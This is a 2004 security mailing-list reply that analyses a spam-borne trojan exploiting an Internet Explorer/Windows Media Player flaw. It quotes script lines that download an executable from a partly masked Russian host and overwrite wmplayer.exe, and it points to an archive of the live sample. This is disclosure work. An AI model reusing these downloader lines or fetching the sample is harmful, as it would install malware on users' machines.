In-Reply-To: <Pine.BSF.4.58.0401290056100.39640@erfrnepu.fhfcvpvbhf.bet> This is a lame trojan? trying to exploit the Windows Media Player/Internet Explorer vulnerability (greetz to Liu Die Yu) x.Open("GET", "http://www.****.ru/dan/updatte.exe",0); [...] s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); Online Demo : http://www.k-otik.com/WMPLAYER-TEST/ Vulnerability fixed with MS03-048 BID (8577, 9013, 9014, 9015). Regards. Chaouki B. /// http://www.k-otik.com >From: Atom 'Smasher' <atom@suspicious.org> >To: bugtraq@securityfocus.com >Subject: new WIN virus? > >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >i don't know much at all about windows, but this spam got past my spam >filter and drew my attention. i tested the suspect file in some on-line >virus checkers, and they all reported the file as not being a threat. >looking at the page that the spam requested (hidden after "@" in the link) >i can only think that the file is up to no-good. > >the original spam, the page that it requests, and the suspicious "exe" >file: > http://smasher.suspicious.org/tmp/live-virus.tgz > >live-virus.tgz >md5: 42e6edfe1dcbb3e83f3da997014c7858 >sha1: 372ef9ce498b3cd23cd7c0c2b404a18f7d1b7771 > >the TGZ contains: >- -rw-r--r-- atom/atom 1606 Jan 29 00:34 2004 spam >- -rw-r--r-- atom/atom 1941 Jan 29 00:31 2004 gift-with-headers.html >- -rw-r--r-- atom/atom 8704 Jan 28 22:41 2004 updatte.exe > >updatte.exe was tested on: > yahoo-mail > http://www.kaspersky.com/remoteviruschk.html > http://www.dials.ru/english/www_av/ > http://www.rav.ro/scan/indexn.php >and they all reported that the file poses no threat. i suspect they're >wrong. > > > ...atom > >
